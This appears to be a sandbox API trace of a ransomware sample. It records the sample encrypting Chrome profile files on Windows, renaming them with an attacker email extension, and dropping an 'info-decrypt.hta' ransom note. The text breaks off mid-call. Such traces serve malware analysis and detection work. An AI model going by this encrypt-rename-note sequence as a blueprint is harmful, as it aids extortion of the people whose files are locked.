0x73 [0196.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x96 [0196.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea48) returned 1 [0196.595] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), fInfoLevelId=0x0, lpFileInformation=0x949eac4 | out: lpFileInformation=0x949eac4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80916060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x2e6fe340, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0196.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea44) returned 1 [0196.595] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0196.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0196.596] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpFilePart=0x0) returned 0x5b [0196.596] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpFilePart=0x0) returned 0x5c [0196.596] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f490 [0196.597] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.598] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82bed750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0196.598] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82adc050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82adc050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0196.598] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82ad9940, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0196.598] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0196.598] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0196.598] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0196.598] FindClose (in: hFindFile=0xb7f490 | out: hFindFile=0xb7f490) returned 1 [0196.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0196.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0196.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0196.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpFilePart=0x0) returned 0x5b [0196.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpFilePart=0x0) returned 0x5c [0196.599] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f490 [0196.600] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.600] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82bed750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0196.600] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82adc050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82adc050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0196.601] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82ad9940, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0196.601] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0196.601] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0196.601] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82adc050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0196.601] FindClose (in: hFindFile=0xb7f490 | out: hFindFile=0xb7f490) returned 1 [0196.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0196.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0196.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", lpFilePart=0x0) returned 0x66 [0196.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\info-decrypt.hta", lpFilePart=0x0) returned 0x6c [0196.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea68) returned 1 [0196.603] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eae4 | out: lpFileInformation=0x949eae4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0196.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea64) returned 1 [0196.604] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", lpFilePart=0x0) returned 0x66 [0196.604] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\info-decrypt.hta", lpFilePart=0x0) returned 0x6c [0196.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e99c) returned 1 [0196.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0196.605] GetFileType (hFile=0x328) returned 0x1 [0196.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e998) returned 1 [0196.605] GetFileType (hFile=0x328) returned 0x1 [0196.605] WriteFile (in: hFile=0x328, lpBuffer=0x36b6710*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949ea60, lpOverlapped=0x0 | out: lpBuffer=0x36b6710*, lpNumberOfBytesWritten=0x949ea60*=0x1000, lpOverlapped=0x0) returned 1 [0196.606] WriteFile (in: hFile=0x328, lpBuffer=0x36b6710*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ea34, lpOverlapped=0x0 | out: lpBuffer=0x36b6710*, lpNumberOfBytesWritten=0x949ea34*=0x55e, lpOverlapped=0x0) returned 1 [0196.607] CloseHandle (hObject=0x328) returned 1 [0196.607] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", lpFilePart=0x0) returned 0x66 [0196.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab4) returned 1 [0196.607] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), fInfoLevelId=0x0, lpFileInformation=0x36b772c | out: lpFileInformation=0x36b772c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82bed750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x156)) returned 1 [0196.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab0) returned 1 [0196.608] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", nBufferLength=0x105, lpBuffer=0x949e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", lpFilePart=0x0) returned 0x66 [0196.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9e8) returned 1 [0196.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x328 [0196.609] GetFileType (hFile=0x328) returned 0x1 [0196.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e4) returned 1 [0196.609] GetFileType (hFile=0x328) returned 0x1 [0196.609] GetFileSize (in: hFile=0x328, lpFileSizeHigh=0x949eaf0 | out: lpFileSizeHigh=0x949eaf0*=0x0) returned 0x156 [0196.609] ReadFile (in: hFile=0x328, lpBuffer=0x36b7b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949ea9c, lpOverlapped=0x0 | out: lpBuffer=0x36b7b20*, lpNumberOfBytesRead=0x949ea9c*=0x156, lpOverlapped=0x0) returned 1 [0196.610] CloseHandle (hObject=0x328) returned 1 [0196.610] CryptAcquireContextW (in: phProv=0x949ea3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea3c*=0x66bb950) returned 1 [0196.611] CryptGenRandom (in: hProv=0x66bb950, dwLen=0x10, pbBuffer=0x36b91e4 | out: pbBuffer=0x36b91e4) returned 1 [0196.876] CryptImportKey (in: hProv=0x66bb950, pbData=0x37e2ba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea0c | out: phKey=0x949ea0c*=0xb7f250) returned 1 [0196.876] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.876] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.876] CryptDuplicateKey (in: hKey=0xb7f250, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e9fc | out: phKey=0x949e9fc*=0xb7f9d0) returned 1 [0196.876] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.876] CryptSetKeyParam (hKey=0xb7f9d0, dwParam=0x4, pbData=0x37e2c88*=0x1, dwFlags=0x0) returned 1 [0196.876] CryptSetKeyParam (hKey=0xb7f9d0, dwParam=0x1, pbData=0x37e2c54, dwFlags=0x0) returned 1 [0196.876] CryptEncrypt (in: hKey=0xb7f9d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37e2c98*, pdwDataLen=0x949ea68*=0x160, dwBufLen=0x160 | out: pbData=0x37e2c98*, pdwDataLen=0x949ea68*=0x160) returned 1 [0196.876] CryptEncrypt (in: hKey=0xb7f9d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37e2e1c*, pdwDataLen=0x949ea70*=0x0, dwBufLen=0x10 | out: pbData=0x37e2e1c*, pdwDataLen=0x949ea70*=0x10) returned 1 [0196.878] CryptDestroyKey (hKey=0xb7f250) returned 1 [0196.878] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0196.878] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0196.878] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", nBufferLength=0x105, lpBuffer=0x949e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", lpFilePart=0x0) returned 0x66 [0196.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9d4) returned 1 [0196.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0196.879] GetFileType (hFile=0x324) returned 0x1 [0196.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9d0) returned 1 [0196.879] GetFileType (hFile=0x324) returned 0x1 [0196.879] WriteFile (in: hFile=0x324, lpBuffer=0x37e3480*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949ea64, lpOverlapped=0x0 | out: lpBuffer=0x37e3480*, lpNumberOfBytesWritten=0x949ea64*=0x20, lpOverlapped=0x0) returned 1 [0196.880] CloseHandle (hObject=0x324) returned 1 [0196.880] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0196.880] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0196.880] CoTaskMemFree (pv=0xbed438) [0196.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0196.880] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea10 | out: ppv=0x949ea10*=0xb51e34) returned 0x0 [0196.881] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea08 | out: pAptType=0x949ea08*=1) returned 0x0 [0196.881] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea0c | out: ppvObject=0x949ea0c*=0x0) returned 0x80004002 [0196.881] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.882] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e378 | out: ppv=0x949e378*=0x60275f0) returned 0x0 [0196.882] WbemDefPath:IUnknown:QueryInterface (in: This=0x60275f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e590 | out: ppvObject=0x949e590*=0x0) returned 0x80004002 [0196.882] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60275f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5a4 | out: ppvObject=0x949e5a4*=0x6029c70) returned 0x0 [0196.882] WbemDefPath:IUnknown:Release (This=0x60275f0) returned 0x0 [0196.882] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1c4 | out: ppvObject=0x949e1c4*=0x6029c70) returned 0x0 [0196.882] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, 